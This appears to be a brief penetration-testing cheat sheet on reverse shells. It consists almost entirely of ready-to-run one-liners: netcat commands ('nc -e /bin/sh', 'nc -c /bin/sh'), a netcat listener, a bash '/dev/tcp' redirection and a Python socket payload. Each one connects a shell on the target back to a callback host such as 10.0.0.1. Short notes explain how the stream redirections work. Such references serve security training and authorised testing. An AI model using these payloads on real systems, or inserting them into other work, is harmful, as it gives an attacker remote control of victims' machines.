# Reverse Shell
A reverse shell provides a way to run commands on a target machine.
## Implementation
In Python.
### Using NetCat for Reverse Shell
```
nc -c /bin/sh <callback IP> <callback port>
```
The above will send a reverse shell back to callback address.

```
/bin/sh | nc <callback IP> <callback port>
```
The above will pipe shell through netcat back to callback address.

```
nc -l -p <listening port> -vvv
```
The above will set up NetCat to listen for callback (reverse shell) in this case.

```
nc -e /bin/sh 10.0.0.1 1234
```

### Other Reverse Shells
```
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```
The above redirects stdin, stdout, and stderr to the socket mounted at 10.0.0.1/8080.

NOTE: >& sends stdout and stderr to the socket.
NOTE: After stdout and stderr are sent to socket, 0>&1 sends stdin to stdout which is redirected to socket.
NOTE: >& can also be written as &>.

```
python -c 'import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.0.0.1", 1234)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(),1); os.dup2(s.fileno(), 2); p=subprocess.call(["/bin/sh", "-i"]);'
```
The above uses python to establish a reverse shell connected to a socket.  Notice how the file descriptors are duplicated.  This is how to redirect the reverse shells interactive streams to the socket.
